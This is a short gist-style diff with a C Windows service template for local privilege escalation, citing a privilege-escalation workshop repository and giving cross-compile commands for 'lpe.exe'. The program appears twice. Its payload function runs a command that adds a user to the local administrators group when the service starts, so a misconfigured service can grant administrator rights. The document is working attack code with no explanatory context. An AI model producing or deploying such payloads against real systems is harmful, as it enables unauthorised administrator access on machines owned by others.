valkheim · May 10, 2021 17:45
diff --git a/windows_service_cmd.c b/windows_service_cmd.c
 /*
 https://github.com/sagishahar/lpeworkshop
 $ sudo apt install gcc-mingw-w64
 $ x86_64-w64-mingw32-gcc windows_service.c -o lpe.exe
 */

 #include <windows.h>
 #include <stdio.h>

 #define SLEEP_TIME 5000

 SERVICE_STATUS ServiceStatus; 
 SERVICE_STATUS_HANDLE hStatus; 
 
 void ServiceMain(int argc, char** argv); 
 void ControlHandler(DWORD request); 

 //add the payload here
 int Run() 
 { 
    system("cmd.exe /k net localgroup administrators user /add");
    return 0; 
 } 

 int main() 
 { 
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "MyService";
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
 
    StartServiceCtrlDispatcher(ServiceTable);  
    return 0;
 }

 void ServiceMain(int argc, char** argv) 
 { 
    ServiceStatus.dwServiceType        = SERVICE_WIN32; 
    ServiceStatus.dwCurrentState       = SERVICE_START_PENDING; 
    ServiceStatus.dwControlsAccepted   = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode      = 0; 
    ServiceStatus.dwServiceSpecificExitCode = 0; 
    ServiceStatus.dwCheckPoint         = 0; 
    ServiceStatus.dwWaitHint           = 0; 
 
    hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler); 
    Run(); 
    
    ServiceStatus.dwCurrentState = SERVICE_RUNNING; 
    SetServiceStatus (hStatus, &ServiceStatus);
 
    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
    {
 		Sleep(SLEEP_TIME);
    }
    return; 
 }

 void ControlHandler(DWORD request) 
 { 
    switch(request) 
    { 
        case SERVICE_CONTROL_STOP: 
 			ServiceStatus.dwWin32ExitCode = 0; 
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
            SetServiceStatus (hStatus, &ServiceStatus);
            return; 
 
        case SERVICE_CONTROL_SHUTDOWN: 
            ServiceStatus.dwWin32ExitCode = 0; 
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
            SetServiceStatus (hStatus, &ServiceStatus);
            return; 
        
        default:
            break;
    } 
    SetServiceStatus (hStatus,  &ServiceStatus);
    return; 
 }
	/*
	https://github.com/sagishahar/lpeworkshop
	$ sudo apt install gcc-mingw-w64
	$ x86_64-w64-mingw32-gcc windows_service.c -o lpe.exe
	*/

	#include <windows.h>
	#include <stdio.h>

	#define SLEEP_TIME 5000

	SERVICE_STATUS ServiceStatus;
	SERVICE_STATUS_HANDLE hStatus;

	void ServiceMain(int argc, char** argv);
	void ControlHandler(DWORD request);

	//add the payload here
	int Run()
	{
	system("cmd.exe /k net localgroup administrators user /add");
	return 0;
	}

	int main()
	{
	SERVICE_TABLE_ENTRY ServiceTable[2];
	ServiceTable[0].lpServiceName = "MyService";
	ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

	ServiceTable[1].lpServiceName = NULL;
	ServiceTable[1].lpServiceProc = NULL;

	StartServiceCtrlDispatcher(ServiceTable);
	return 0;
	}

	void ServiceMain(int argc, char** argv)
	{
	ServiceStatus.dwServiceType = SERVICE_WIN32;
	ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
	ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP \| SERVICE_ACCEPT_SHUTDOWN;
	ServiceStatus.dwWin32ExitCode = 0;
	ServiceStatus.dwServiceSpecificExitCode = 0;
	ServiceStatus.dwCheckPoint = 0;
	ServiceStatus.dwWaitHint = 0;

	hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);
	Run();

	ServiceStatus.dwCurrentState = SERVICE_RUNNING;
	SetServiceStatus (hStatus, &ServiceStatus);

	while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
	{
	Sleep(SLEEP_TIME);
	}
	return;
	}

	void ControlHandler(DWORD request)
	{
	switch(request)
	{
	case SERVICE_CONTROL_STOP:
	ServiceStatus.dwWin32ExitCode = 0;
	ServiceStatus.dwCurrentState = SERVICE_STOPPED;
	SetServiceStatus (hStatus, &ServiceStatus);
	return;

	case SERVICE_CONTROL_SHUTDOWN:
	ServiceStatus.dwWin32ExitCode = 0;
	ServiceStatus.dwCurrentState = SERVICE_STOPPED;
	SetServiceStatus (hStatus, &ServiceStatus);
	return;

	default:
	break;
	}
	SetServiceStatus (hStatus, &ServiceStatus);
	return;
	}